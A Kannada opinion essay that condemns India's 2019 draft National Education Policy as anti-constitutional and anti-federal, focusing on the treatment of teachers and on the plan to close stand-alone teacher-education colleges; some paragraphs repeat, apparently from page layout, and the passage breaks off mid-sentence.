2019ರ ರಾಷ್ಟ್ರೀಯ ಶಿಕ್ಷಣ ನೀತಿ: ಸಂವಿಧಾನ ವಿರೋಧಿ ಉಪಕ್ರಮ

ಈ ಶಿಕ್ಷಣ ನೀತಿ ಸಂವಿಧಾನ ವಿರೋಧಿ ಹಾಗೂ ಒಕ್ಕೂಟ ವಿರೋಧಿ ಎಂಬ ಕಾರಣಕ್ಕೆ ನಾನಿದನ್ನು ಖಂಡಿಸುತ್ತೇನೆ; ಹಾಗೆಯೇ ಶಿಕ್ಷಕರು ಹಾಗೂ ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣಕ್ಕೆ ಮಾಡಿರುವ ದ್ರೋಹಕ್ಕಾಗಿ ತಿರಸ್ಕರಿಸುತ್ತೇನೆ.

ಕೇಂದ್ರ ಸರಕಾರ 2019ರ ರಾಷ್ಟ್ರೀಯ ಶಿಕ್ಷಣ ನೀತಿಯ ಕರಡನ್ನು ಸಾರ್ವಜನಿಕ ಓದು, ವ್ಯಾಖ್ಯಾನ ಹಾಗೂ ಸಲಹೆ ನೀಡಿಕೆಗಾಗಿ ಬಿಡುಗಡೆಗೊಳಿಸಿದೆ. ಒಟ್ಟು 4 ಭಾಗಗಳಲ್ಲಿ 23 ಅಧ್ಯಾಯಗಳಲ್ಲಿ ಹರಡಿಕೊಂಡಿರುವ ಈ ದಸ್ತಾವೇಜು 470 ಪುಟಗಳಿಗೂ ಮಿಕ್ಕಿ ಮೀರಿದೆ. ಈಗಾಗಲೆ ಕೇಂದ್ರ ಸರಕಾರಕ್ಕೆ ಒಂದೂವರೆ ಲಕ್ಷಕ್ಕೂ ಮಿಗಿಲು ಹಿಮ್ಮಾಹಿತಿ, ಸಲಹೆ ಸೂಚನೆಗಳು ಬಂದಿವೆಯಂತೆ. ಅವೆಲ್ಲವನ್ನೂ ಪೂರ್ಣಪ್ರಮಾಣದಲ್ಲಿ ಪರಿಶೀಲಿಸಿ ಈ ನೀತಿಯಲ್ಲಿ ಯುಕ್ತವಾದ ಮಾರ್ಪಾಡುಗಳನ್ನು ಮಾಡಲಾಗುವುದೇ? ಅದು ಸಾಧ್ಯವೇ? ಎಂಬ ಒಂದು ಪ್ರಶ್ನೆ ನಮ್ಮ ಮುಂದಿದೆ. ಸರಕಾರಗಳು ಜನರ ಅಹವಾಲುಗಳನ್ನು ಆಲಿಸಿ ಅವರ ಮನೋಗತಗಳಿಗೆ ತಾವು ಸ್ಪಂದಿಸುತ್ತೇವೆ, ಯಾವುದೇ ನೀತಿ ಪ್ರಜಾಪ್ರಭುತ್ವದಲ್ಲಿ ಜನರ ಭಾಗಿತ್ವದಿಂದ ಆಗುವ ಕೆಲಸ ಎಂದು ಬಿಂಬಿಸಲು ಮತ್ತು ತಮ್ಮದು ಪ್ರಜಾಪ್ರಭುತ್ವವಾದಿ ಸರಕಾರ ಎಂದು ಮಂಕುಬೂದಿ ಎರಚಲು ಇಂಥ ನಾಟಕಗಳನ್ನು ಆಡುತ್ತವೆ. 1986ರ ರಾಷ್ಟ್ರೀಯ ಶಿಕ್ಷಣ ನೀತಿ ದೇಶದಲ್ಲಿ ಜಾರಿಗೆ ಬಂದಾಗಲೂ ಈ ಪ್ರಹಸನ ನಡೆದಿತ್ತು; ಮತ್ತು ಈ ಪ್ರಹಸನ ಮುಂದುವರಿಯುವುದರಲ್ಲಿ ಯಾವ ಸಂಶಯವೂ ಇಲ್ಲ.

ಆದರೆ ಈ ಶಿಕ್ಷಣ ನೀತಿ ಸಂವಿಧಾನ ವಿರೋಧಿ ಹಾಗೂ ಒಕ್ಕೂಟ ವಿರೋಧಿ ಎಂಬ ಕಾರಣಕ್ಕ್ಕೆ ನಾನಿದನ್ನು ಖಂಡಿಸುತ್ತೇನೆ; ಹಾಗೆಯೇ ಶಿಕ್ಷಕರು ಹಾಗೂ ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣಕ್ಕ್ಕೆ ಮಾಡಿರುವ ದ್ರೋಹಕ್ಕಾಗಿ ತಿರಸ್ಕರಿಸುತ್ತೇನೆ.

ರಾಜ್ಯ ಭಾಷೆಗಳಲ್ಲಿ ಇನ್ನೂ ಅನುವಾದಗೊಂಡಿಲ್ಲದ ಕಾರಣ ಕೇವಲ ಇಂಗ್ಲಿಷ್ ಹಿಂದಿ ಬಲ್ಲ ಕೆಲವೇ ಕೆಲವು ಪ್ರಜ್ಞಾವಂತರು ಸಲಹೆ ಸೂಚನೆಗಳನ್ನು ನೀಡುವುದಕ್ಕೆ ಅವಕಾಶವಾಗಿದೆ. ಇದರಿಂದಾಗಿ ಬಹುದೊಡ್ಡ ಪ್ರಜಾವರ್ಗವನ್ನು ಕೇಂದ್ರ ಸರಕಾರ ಹೊರಗಿಟ್ಟಿರುವುದು ಸಂವಿಧಾನ ವಿರೋಧಿ ಮತ್ತು ಒಕ್ಕೂಟ ವಿರೋಧಿ ಕ್ರಮವಲ್ಲದೆ ಮತ್ತೇನು?

ಶಿಕ್ಷಣವು ಸಂವಿಧಾನದ ಸಮವರ್ತಿ ಪಟ್ಟಿಯಲ್ಲಿದ್ದು ರಾಷ್ಟ್ರವ್ಯಾಪಿ ಚರ್ಚೆಗೆ ಕರಡು ನೀತಿಯನ್ನು ಬಿಡುಗಡೆ ಮಾಡುವ ಮುನ್ನ ರಾಜ್ಯಗಳ ಜೊತೆ ಸಮಾಲೋಚನೆ ಮಾಡಬೇಕಾಗಿದ್ದು ಸೂಕ್ತ. ಅಂಥ ಯಾವ ಚರ್ಚೆಯೂ ನಡೆದಂತೆ ತೋರುವುದಿಲ್ಲ. ಮೇಲಾಗಿ, ಜನ ಇಂಥ ಕರಡು ನೀತಿಯನ್ನು ಓದಿಕೊಂಡು ತಮ್ಮ ಅಭಿಪ್ರಾಯಗಳನ್ನು ಸರಕಾರಕ್ಕೆ ಸಲ್ಲಿಸಬೇಕಾದರೆ ದಸ್ತಾವೇಜು ಜನ ಭಾಷೆಗಳಲ್ಲಿ ಇರಬೇಕಾದದ್ದು ತೀರ ಆವಶ್ಯಕ. ಈಗ ತಿಳಿದುಬರುವಂತೆ ದಸ್ತಾವೇಜು ಇಂಗ್ಲಿಷಿನಲ್ಲಿದೆ. ಮತ್ತು ಅದರ ಅನುವಾದ ಹಿಂದಿಯಲ್ಲಿದೆ; ರಾಜ್ಯ ಭಾಷೆಗಳಲ್ಲಿ ಇನ್ನೂ ಅನುವಾದಗೊಂಡಿಲ್ಲದ ಕಾರಣ ಕೇವಲ ಇಂಗ್ಲಿಷ್ ಹಿಂದಿ ಬಲ್ಲ ಕೆಲವೇ ಕೆಲವು ಪ್ರಜ್ಞಾವಂತರು ಸಲಹೆ ಸೂಚನೆಗಳನ್ನು ನೀಡುವುದಕ್ಕೆ ಅವಕಾಶವಾಗಿದೆ. ಇದರಿಂದಾಗಿ ಬಹುದೊಡ್ಡ ಪ್ರಜಾವರ್ಗವನ್ನು ಕೇಂದ್ರ ಸರಕಾರ ಹೊರಗಿಟ್ಟಿರುವುದು ಸಂವಿಧಾನ ವಿರೋಧಿ ಮತ್ತು ಒಕ್ಕೂಟ ವಿರೋಧಿ ಕ್ರಮವಲ್ಲದೆ ಮತ್ತೇನು?

ಶಿಕ್ಷಕರ ಸ್ಥಾನಮಾನ ಎತ್ತರಿಸಲು, ಸಬಲೀಕರಿಸಲು  ಸೂಚಿಸಿದ ಸುಧಾರಣಾ ಕ್ರಮಗಳು

• ಹೊಸದಾಗಿ ಪ್ರಾರಂಭವಾಗಲಿರುವ ನಾಲ್ಕು ವರ್ಷಗಳ ಸಮಗ್ರ ಬಿ.ಎಡ್. ಕೋರ್ಸಿಗೆ ಅತ್ಯುತ್ತಮವಾದ ವಿದ್ಯಾರ್ಥಿಗಳನ್ನು ಆಕರ್ಷಿಸಲು ಶಿಷ್ಯವೇತನಗಳನ್ನು ನೀಡಬೇಕು.

• ಗ್ರಾಮೀಣ ಭಾಗಗಳಲ್ಲಿ ಕಾರ್ಯನಿರ್ವಹಿಸುವ ಶಿಕ್ಷಕರಿಗೆ ವಿಶೇಷವಾದ ಸವಲತ್ತುಗಳನ್ನು ಒದಗಿಸಬೇಕು.

• ಶಿಕ್ಷಕರನ್ನು ಪದೇ ಪದೇ ವರ್ಗಾವಣೆ ಮಾಡುವ ಕ್ರಮವನ್ನು ಸ್ಥಗಿತಗೊಳಿಸಬೇಕು.

• ಶಿಕ್ಷಕರ ಆಯ್ಕೆಯ ಸಂದರ್ಭದಲ್ಲಿ ಸಂದರ್ಶನ ಹಾಗೂ ಪ್ರಾತ್ಯಕ್ಷಿಕೆ ಪಾಠನೀಡುವ ವ್ಯವಸ್ಥೆಯನ್ನು ಜಾರಿಗೆ ತರಬೇಕು.

• ಶಿಕ್ಷಕರಿಗೆ ಶಾಲೆಗಳಲ್ಲಿ ಮೂಲಭೂತ ಸೌಕರ್ಯಗಳನ್ನು ಒದಗಿಸಬೇಕು.

• ಶಿಕ್ಷಕರ ನಡುವೆ ಪರಸ್ಪರ ವಿಚಾರ ವಿನಿಮಯ ಹಾಗೂ ಶಾಲೆಗಳ ಗುಣಾತ್ಮಕತೆ ಹೆಚ್ಚಿಸಲು ಶಾಲಾ ಸಂಕೀರ್ಣ ವ್ಯವಸ್ಥೆಯನ್ನು ಜಾರಿಗೆ ತರಬೇಕು.

• ಶಿಕ್ಷಕರ ನಿರಂತರ ವೃತ್ತಿಪರ ವಿಕಾಸಕ್ಕೆ ಒತ್ತು ನೀಡಬೇಕು.

• ವಿವಿಧ ರಾಜ್ಯಗಳಲ್ಲಿ ಮತ್ತು ಒಟ್ಟು ದೇಶದಲ್ಲಿ ಅಗತ್ಯವಿರುವ ಶಿಕ್ಷಕರ ಸಂಖ್ಯೆಯನ್ನು ಕುರಿತು ಯೋಜನೆಯ ನಿರ್ಮಾಣ.

• ಪಠ್ಯಕ್ರಮ ಹಾಗೂ ಬೋಧನ ಕ್ರಮಗಳಿಗೆ ಸಂಬಂಧಿಸಿದಂತೆ ಶಿಕ್ಷಕರಿಗೆ ಹೆಚ್ಚಿನ ಸ್ವಾಯತ್ತೆಯನ್ನು ಕಲ್ಪಿಸಬೇಕು.

• ಪ್ರತಿಭೆ ಆಧಾರಿತ ಬಡ್ತಿ ಹಾಗೂ ವೇತನ ರಚನೆಯನ್ನು ರೂಪಿಸುವುದು. ಇದಕ್ಕಾಗಿ ಶಿಕ್ಷಕರ ನಿರ್ವಹಣೆಯನ್ನು ಅಳೆಯುವ ಬಹುವಿಧದ ಸಾಧನಗಳನ್ನುರೂಪಿಸುವುದು.

• ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣವನ್ನು ಬಹುಶಾಸ್ತ್ರೀಯ ಕಾಲೇಜುಗಳಿಗೆ ಹಾಗೂ ವಿಶ್ವವಿದ್ಯಾನಿಲಯಗಳಿಗೆ ವರ್ಗಾಯಿಸುವುದು. ಈಗ ಇರುವ ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ಕಾಲೇಜುಗಳನ್ನು ಆದಷ್ಟು ಶೀಘ್ರ ಮುಚ್ಚುವುದು.

• ಸಮುದಾಯದ ಪ್ರತಿಭಾನ್ವಿತ ವ್ಯಕ್ತಿಗಳು ಶಾಲೆಗಳು ಹಾಗೂ ಶಾಲಾ ಸಂಕೀರ್ಣಗಳಲ್ಲಿ ‘ವಿಶೇಷ ಶಿಕ್ಷಕ’ರನೆಯಲ್ಲ್ಲಿ ಬೋಧನೆ ಮಾಡಲು ಅವಕಾಶ ಕಲ್ಪಿಸುವುದು.

ಶಿಕ್ಷಣ ನೀತಿಗೆ ಸಂಬಂಧಿಸಿದ ದಸ್ತಾವೇಜಿನ ಬಗ್ಗೆ ಕೇಂದ್ರೀಯ ಶಿಕ್ಷಣ ಸಲಹಾ ಸಮಿತಿಯಲ್ಲಿ ಶಿಕ್ಷಣ ಸಚಿವರ ನಡುವೆ ಚರ್ಚೆ ನಡೆದು ಪಾರ್ಲಿಮೆಂಟಿನಲ್ಲಿ ಅನುಮೋದನೆಯಾದ ಬಳಿಕ ಅಂತಿಮ ವರದಿ ಸಿದ್ಧಗೊಂಡು ಮತ್ತೆ ಅದು ಅನುಷ್ಠಾನಕ್ಕೆ ಬರುತ್ತದೆ. ಆದರೆ ಈ ಎಲ್ಲ ಪ್ರಕ್ರಿಯೆಗಳು ಇನ್ನೂ ನೆರವೇರುವುದಕ್ಕೂ ಮೊದಲೇ ಕೇಂದ್ರ ಸರಕಾರದ ಸಚಿವರು ‘ಮುಂದಿನ ಶೈಕ್ಷಣಿಕ ವರ್ಷದಿಂದಲೆ ‘ನಾಲ್ಕು ವರ್ಷಗಳ ಪದವಿ ವ್ಯಾಸಂಗ ಜಾರಿ’, ‘ನಾಲ್ಕು ವರ್ಷಗಳ ಸಮಗ್ರ ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ಪದವಿ ಜಾರಿ’ ಎಂದು ಹೇಳಿಕೆ ಕೊಡುತ್ತಿರುವುದು ಯೋಗ್ಯ ನಡೆಯಲ್ಲ. ಸಮಗ್ರ ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ಅರ್ಥಾತ್ ಇಂಟಿಗ್ರೇಟೆಡ್ ಬಿ.ಎಡ್. ಪದವಿ ಪ್ರಾರಂಭ ಮಾಡುವುದಕ್ಕೆ ಶಿಕ್ಷಣ ಕಾಲೇಜುಗಳಿಗೆ ಅವಕಾಶ ಕಲ್ಪಿಸದೆ ಎನ್‍ಸಿಟಿಇ ನಿಯಂತ್ರಕ ಸಂಸ್ಥೆಯು ಪದವಿ ಕಾಲೇಜುಗಳಿಗೆ ಜುಲೈ 31, 2019ರ ಒಳಗೆ ಅರ್ಜಿಸಲ್ಲಿಸಲು ಅವಕಾಶ ಮಾಡಿಕೊಟ್ಟಿರುವುದು ಖಂಡನಾರ್ಹ; ಅಂದರೆ ಪ್ರಜಾಪ್ರಭುತ್ವದಲ್ಲಿ ಯಾವುದೇ ಪಕ್ಷದ ಸರಕಾರ ಪೂರ್ಣ ಬಹುಮತ ಹೊಂದಿದಲ್ಲಿ ಅದು ಒಕ್ಕೂಟ ವ್ಯವಸ್ಥೆಗೆ ಮಾರಕವಾಗುವ ಎಂಥ ದಬ್ಬಾಳಿಕೆಯ ಕ್ರಮವನ್ನೂ ಅನುಸರಿಸುತ್ತದೆ ಎಂಬುದಕ್ಕೆ ಈ ಪ್ರಕರಣ ಸಾಕ್ಷಿಯಾಗಿದೆ. ಮೇಲಾಗಿ ಇದು ಜನತಂತ್ರ ವಿರೋಧಿ ಕ್ರಮವೆನ್ನದೆ ಗತ್ಯಂತರವಿಲ್ಲ.

ಅದು ಶಾಲಾ ಶಿಕ್ಷಣದಲ್ಲಿರುವ ಸರಕಾರಿ ಶಾಲೆಗಳು ಹಾಗೂ ಶಿಕ್ಷಕರನ್ನು ಪ್ರಧಾನವಾಗಿ ಗಮನಿಸಿದೆ. ಈ ದೇಶದಲ್ಲಿರುವ ವಿವಿಧ ಬಗೆಯ ಶಾಲೆಗಳನ್ನು, ಈ ಶಾಲೆಗಳಲ್ಲಿ ಬೋಧನೆ ಮಾಡುತ್ತಿರುವ ಶಿಕ್ಷಕರ ನಡುವಿನ ನಾನಾ ಬಗೆಯ ತಾರತಮ್ಯಗಳನ್ನು, ಅನುಭವಿಸುತ್ತಿರುವ ಬಗೆಬಗೆಯ ಸಮಸ್ಯೆಗಳನ್ನು ಪರಿಣತರು ಗಮನಿಸದೇ ಇರುವುದು ಈ ನೀತಿಯ ಬಲುದೊಡ್ಡ ಕೊರತೆ ಅಥವಾ ಇದೂ ಒಂದು ಬಗೆಯ ಜಾಣ ಕುರುಡುತನ.

ಕರಡು ರಾಷ್ಟ್ರೀಯ ಶಿಕ್ಷಣ ನೀತಿಯ 5ನೆಯ ಮತ್ತು 15ನೆಯ ಅಧ್ಯಾಯದಲ್ಲಿ ‘ಶಿಕ್ಷಕರು’ ಮತ್ತು ‘ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ’ದ ಸದ್ಯದ ‘ಸ್ಥಿತಿಗತಿಗಳ ಮೇಲೆ ಬೆಳಕು ಚೆಲ್ಲಿ ಸುಧಾರಣೆಗೆ ಹಲವು ಸಲಹೆಗಳನ್ನು ನೀಡಲಾಗಿದೆ. ಹಾಗೆಯೇ ಶಿಕ್ಷಕರ ಸ್ಥಾನಮಾನ ಎತ್ತರಿಸುವ ಮತ್ತು ಅವರನ್ನು ಸಬಲೀಕರಿಸುವ ದೃಷ್ಟಿಯಿಂದ ಕೈಕೊಳ್ಳಬಹುದಾದ ಕೆಲವು ಸುಧಾರಣಾ ಕ್ರಮಗಳನ್ನು ಈ ಕಡತದಲ್ಲಿ ನಿರೂಪಿಸಲಾಗಿದೆ (ಬಾಕ್ಸ್ ನೋಡಿ).

ಕರಡು ದಸ್ತಾವೇಜಿನಲ್ಲಿ ಕೊಟ್ಟಿರುವ ಈ ಸಲಹೆಗಳನ್ನು ಓರ್ವ ಐಎಎಸ್ ಅಧಿಕಾರಿ ನೀಡಲು ಹಾಗೂ ಅದಕ್ಕೆ ಬಹುಕ್ಷೇತ್ರಗಳ ಪರಿಣತರ ಆವಶ್ಯಕತೆಯಿಲ್ಲ. ಬಹಳ ಮುಖ್ಯವಾದ ಸಂಗತಿ ಎಂದರೆ ಶಾಲಾ ಶಿಕ್ಷಕರ ಸ್ಥಿತಿಗತಿಗಳ ಅಧ್ಯಯನ ಮಾಡಿದ ಕರಡು ನೀತಿ ನಿಜಕ್ಕೂ ಕಠೋರ ವಾಸ್ತವಕ್ಕೆ ಕುರುಡಾಗಿದೆ. ಅದು ಶಾಲಾ ಶಿಕ್ಷಣದಲ್ಲಿರುವ ಸರಕಾರಿ ಶಾಲೆಗಳು ಹಾಗೂ ಶಿಕ್ಷಕರನ್ನು ಪ್ರಧಾನವಾಗಿ ಗಮನಿಸಿದೆ. ಈ ದೇಶದಲ್ಲಿರುವ ವಿವಿಧ ಬಗೆಯ ಶಾಲೆಗಳನ್ನು, ಈ ಶಾಲೆಗಳಲ್ಲಿ ಬೋಧನೆ ಮಾಡುತ್ತಿರುವ ಶಿಕ್ಷಕರ ನಡುವಿನ ನಾನಾ ಬಗೆಯ ತಾರತಮ್ಯಗಳನ್ನು, ಅನುಭವಿಸುತ್ತಿರುವ ಬಗೆಬಗೆಯ ಸಮಸ್ಯೆಗಳನ್ನು ಪರಿಣತರು ಗಮನಿಸದೇ ಇರುವುದು ಈ ನೀತಿಯ ಬಲುದೊಡ್ಡ ಕೊರತೆ ಅಥವಾ ಇದೂ ಒಂದು ಬಗೆಯ ಜಾಣ ಕುರುಡುತನ.

ಏಕೆಂದರೆ ದೇಶದ ವಿವಿಧ ರಾಜ್ಯಗಳಲ್ಲಿ ಕೇಂದ್ರ ಹಾಗೂ ರಾಜ್ಯ ಸರಕಾರಗಳ ಶಾಲೆಗಳು, ಅನುದಾನಿತ ಶಾಲೆಗಳು, ವಿಶೇಷ ಶಾಲೆಗಳು ಹಾಗೂ ಖಾಸಗಿ ರಂಗದ ಶಾಲೆಗಳಿವೆ. ಈ ಶಿಕ್ಷಕರ ಜತೆಜತೆಗೆ ‘ಗೌರವ ಶಿಕ್ಷಕರು’ ಹಾಗೂ ಅತಿಥಿ ಶಿಕ್ಷಕರೂ ಇದ್ದಾರೆ. ಸರಕಾರಿ ಶಿಕ್ಷಕರಿಗೆ ಸಿಗುವ ಎಲ್ಲ ಸೌಕರ್ಯಗಳು ಅನುದಾನಿತ ಶಿಕ್ಷಕರಿಗೆ ಇನ್ನೂ ಗಗನಕುಸುಮವಾಗಿಯೇ ಉಳಿದಿವೆ. ಹೆಚ್ಚೇಕೆ, ಹಲವು ರಾಜ್ಯಗಳಲ್ಲಿ ಅನುದಾನಿತ ಶಾಲಾ ಶಿಕ್ಷಕರಿಗೆ ಬೇರೇನೂ ಬೇಡ, ತಿಂಗಳ ಪಗಾರ ಪ್ರತಿತಿಂಗಳ ಐದನೆಯ ತಾರೀಖಿನ ಒಳಗೆ ಖಾತೆಗೆ ಜಮೆಯಾಗುವುದಿಲ್ಲ. ಅನುದಾನ ನೀಡಿಕೆ ವಿಳಂಬವಾದಾಗಲೆಲ್ಲ ಶಿಕ್ಷಕರಿಗೆ ಎರಡು ಮೂರು ತಿಂಗಳುಗಳಾದರೂ ವೇತನ ಬಟವಾಡೆಯಾಗುವುದಿಲ್ಲ್ಲ.

ಈ ಬಗೆಯ ಶಾಲೆಗಳಲ್ಲಿ ಕಾರ್ಯ ನಿರ್ವಹಿಸುವ ಶಿಕ್ಷಕರ ನೇಮಕಾತಿ, ವಿದ್ಯಾರ್ಹತೆ, ವೇತನ ಶ್ರೇಣಿ, ಸೇವಾನಿಯಮ, ಪಿಂಚಣಿ, ಹಾಗೂ ಉಪದಾನ ಇತ್ಯಾದಿಗಳಲ್ಲಿ ದೇಶಾದ್ಯಂತ ಏಕರೂಪತೆಯಿಲ್ಲ. ಈ ನಿಯಮಗಳ ಬಿಗಿಯಾದ ಪಾಲನೆಗೆ ಸಂಬಂಧಪಟ್ಟಂತೆ ವ್ಯವಸ್ಥಿತವಾದ ನಿಯಂತ್ರಣ-ಪರಿಶೀಲನವೂ ಗೈರು ಹಾಜರಾಗಿದೆ.

ಸರಕಾರಿ ಶಾಲೆಗಳಲ್ಲಿ ಮಕ್ಕಳಿಲ್ಲದಿದ್ದರೂ ಸರಕಾರ ಆಂಗ್ಲ ಮಾಧ್ಯಮ ವಿಭಾಗಗಳನ್ನು ತೆರೆದು ಶಾಲೆಗಳನ್ನು ಉಳಿಸಿಕೊಳ್ಳುತ್ತಿದೆ. ಆದರೆ ಈ ನಿಯಮ ಅನುದಾನಿತ ದೇಶಭಾಷಾ ಶಾಲೆಗಳಿಗೆ ಅನ್ವಯವಾಗುವುದಿಲ್ಲ. ಅಲ್ಪ ದಾಖಲಾತಿ ಅಥವಾ ಶೂನ್ಯ ದಾಖಲಾತಿಯ ನೆಪವೊಡ್ಡಿ ಸರಕಾರಗಳು ಇಂಥ ಅನುದಾನಿತ ಶಾಲೆಗಳನ್ನು ದೊಡ್ಡ ಪ್ರಮಾಣದಲ್ಲಿ ಮುಚ್ಚುವ ದುಸ್ಸಾಹಸಕ್ಕೂ ಕೈಹಾಕಿವೆ. ಇತ್ತೀಚಿನ ವರ್ಷಗಳಲ್ಲಿ ಸರಕಾರಗಳ ಉದಾರ ನೀತಿಯಿಂದಾಗಿ ಖಾಸಗಿ ಆಂಗ್ಲ ಮಾಧ್ಯಮ ಶಾಲೆಗಳು ಧಾರಾಳ ಪ್ರಮಾಣದಲ್ಲಿ ಸ್ಥಾಪನೆಯಾಗಿವೆ. ಈ ಬಗೆಯ ಶಾಲೆಗಳಲ್ಲಿ ಕಾರ್ಯ ನಿರ್ವಹಿಸುವ ಶಿಕ್ಷಕರ ನೇಮಕಾತಿ, ವಿದ್ಯಾರ್ಹತೆ, ವೇತನ ಶ್ರೇಣಿ, ಸೇವಾನಿಯಮ, ಪಿಂಚಣಿ, ಹಾಗೂ ಉಪದಾನ ಇತ್ಯಾದಿಗಳಲ್ಲಿ ದೇಶಾದ್ಯಂತ ಏಕರೂಪತೆಯಿಲ್ಲ. ಈ ನಿಯಮಗಳ ಬಿಗಿಯಾದ ಪಾಲನೆಗೆ ಸಂಬಂಧಪಟ್ಟಂತೆ ವ್ಯವಸ್ಥಿತವಾದ ನಿಯಂತ್ರಣ-ಪರಿಶೀಲನವೂ ಗೈರು ಹಾಜರಾಗಿದೆ. ಹೀಗಾಗಿ ಕಳೆದ ಒಂದೆರಡು ದಶಕಗಳಲ್ಲಿ ಅಸಂಘಟಿತ ಕಾರ್ಮಿಕ ವಲಯದ ಹಾಗೆ ಅಸಂಘಟಿತ ಖಾಸಗಿ ಶಿಕ್ಷಕರ ವೃಂದ ಈ ದೇಶದಲ್ಲಿ ನಿರ್ಮಾಣವಾಗಿದೆ. ಇಂಥ ಒಂದು ವಾಸ್ತ್ತವವನ್ನು ಗಮನಿಸಿ ಅದನ್ನು ಸರಿಪಡಿಸುವುದಕ್ಕೆ ಬೇಕಾದ ದೂರದೃಷ್ಟಿ, ಇಚ್ಛಾಶಕ್ತಿ ಹಾಗೂ ರಾಜಕೀಯ ಸಂಕಲ್ಪಬಲ ದಸ್ತಾವೇಜಿನಲ್ಲಿ ಎಲ್ಲಿಯೂ ಪ್ರಕಟವಾಗದಿರುವುದು ‘ಶಿಕ್ಷಕರ ಸಬಲೀಕರಣ’ ಎಂಬ ಪರಿಕಲ್ಪನೆಯ ಅಪಹಾಸ್ಯವೇ ಸರಿ.

ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ

ಕರಡು ಶಿಕ್ಷಣ ನೀತಿಯ ದಸ್ತಾವೇಜಿನ 15ನೆಯ ಅಧ್ಯಾಯವು ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣವನ್ನು ಕುರಿತಾಗಿದೆ. ಈ ಭಾಗದಲ್ಲಿ ಕೊಟ್ಟಿರುವ ಬಗೆ ಬಗೆಯ ಸಲಹೆ ಸೂಚನೆಗಳನ್ನು ಲಕ್ಷ್ಯಕ್ಕೆ ತೆಗೆದುಕೊಳ್ಳದೆ ಕೇವಲ ತಥಾಕಥಿತ ‘ಕ್ರಾಂತಿಕಾರಿ’ಯಾದ ಒಂದು ಮುಖ್ಯಾಂಶವನ್ನು ನಾನಿಲ್ಲಿ ಚರ್ಚೆಗೆ ಎತ್ತಿಕೊಳ್ಳುತ್ತಿರುವೆ.

ದೇಶದಲ್ಲಿ ಕಂಡುಬಂದಿರುವ ‘ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ’ ಅತ್ಯಂತ ‘ಮೀಡಿಯೋಕರ್’ ಅಥವಾ ಕಳಪೆ. ಅದು ವ್ಯಾಪಕ ಭ್ರಷ್ಟಾಚಾರ ಮತ್ತು ವ್ಯಾಪಾರೀಕರಣದಿಂದಾಗಿ ನಲುಗಿದೆ; ದೇಶದಲ್ಲಿ ಒಟ್ಟು 17000 ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳಿವೆ. ಅವುಗಳಲ್ಲಿ ಸುಮಾರು 10,000 ಸಂಸ್ಥೆಗಳು ಖಾಸಗಿರಂಗದಲ್ಲಿವೆ. ‘ಬಿ.ಎಡ್.’ ಎಂಬ ಒಂದೇ ಒಂದು ಕಾರ್ಯಕ್ರಮವಿರುವ ಈ ಕಾಲೇಜುಗಳು ‘ಒಂಟಿ’ ಅಥವಾ ‘ಸ್ಟ್ಯಾಂಡ್ ಅಲೋನ್’ ಆಗಿವೆ. ಉತ್ಕಷ್ಟ ಶಿಕ್ಷಕರ ನಿರ್ಮಾಣ ಹಾಗೂ ಗುಣಾತ್ಮಕತೆಗೆ ಸಂಬಂಧಪಟ್ಟಂತೆ ಈ ಸಂಸ್ಥೆಗಳಲ್ಲಿ ಬದ್ಧತೆಯಿಲ್ಲ. ಇವು ಪದವಿಗಳನ್ನು ಮಾರಾಟ ಮಾಡುವ, ಭ್ರಷ್ಟಾಚಾರ ತುಂಬಿತುಳುಕಾಡುವ ಸಂಸ್ಥೆಗಳಾಗಿವೆ. ಇವುಗಳಲ್ಲಿ ಬಹಳಷ್ಟು ಕಾಲೇಜುಗಳು ಕಳಪೆ ಗುಣಮಟ್ಟದವುಗಳಾಗಿದ್ದು ಈ ಸಂಸ್ಥೆಗಳನ್ನು ಆದಷ್ಟು ತ್ವರಿತವಾಗಿ ಮುಚ್ಚುವ ವ್ಯವಸ್ಥೆಯಾಗಬೇಕು.

ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣದ ಸಮಗ್ರತೆ, ವಿಶ್ವ್ವಸನೀಯತೆ ಹಗೂ ಗುಣಾತ್ಮಕತೆ ದೃಷ್ಟಿಯಿಂದ 2030ರ ಹೊತ್ತಿಗೆ ಇಂಥ ಯಾವ ‘ಒಂಟಿ’ ಕಾಲೇಜುಗಳೂ ಇರಲಾರದು, ಈ ನಿಟ್ಟಿನಲ್ಲಿ ಯಾವುದೇ ಕಾನೂನಾತ್ಮಕ ಪ್ರತಿರೋಧ ಬಂದರೂ ಸಮರ್ಥವಾಗಿ ಎದುರಿಸಲಾಗುವುದು ಎಂಬ ಹಾಗೆ ದಸ್ತಾವೇಜಿನಲ್ಲಿ ಹೇಳಲಾಗಿದೆ.

ನ್ಯಾಯಮೂರ್ತಿ ಜೆ.ಎಸ್.ವವರ್i (2012) ಸಮಿತಿ ಈ ಸಂಸ್ಥೆಗಳ ಶೊಚನೀಯ ಸ್ಥಿತಿಗತಿಗಳ ಬಗ್ಗೆ ಮಾಡಿರುವ ವರದಿಯನ್ನು ಆಧರಿಸಿ ‘ಕ್ರಾಂತಿಕಾರಿ’ ಉಪಕ್ರಮವೆಂಬಂತೆ ಈ ‘ಒಂಟಿ’ ಕಾಲೇಜನ್ನು ಮುಚ್ಚುವುದಲ್ಲದೆ 2023ರ ಹೊತ್ತಿಗೆ 4 ವರ್ಷಗಳ ಸಮಗ್ರ ಬಿ.ಎಡ್. ದೇಶಾದ್ಯಂತ ಜಾರಿಗೆ ಬರುವ ವ್ಯವಸ್ಥೆಯಾಗಬೇಕು ಎಂದು ಕರಡು ನೀತಿಯಲ್ಲಿ ತಿಳಿಸಲಾಗಿದೆ. ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣದ ಸಮಗ್ರತೆ, ವಿಶ್ವ್ವಸನೀಯತೆ ಹಗೂ ಗುಣಾತ್ಮಕತೆ ದೃಷ್ಟಿಯಿಂದ 2030ರ ಹೊತ್ತಿಗೆ ಇಂಥ ಯಾವ ‘ಒಂಟಿ’ ಕಾಲೇಜುಗಳೂ ಇರಲಾರದು, ಈ 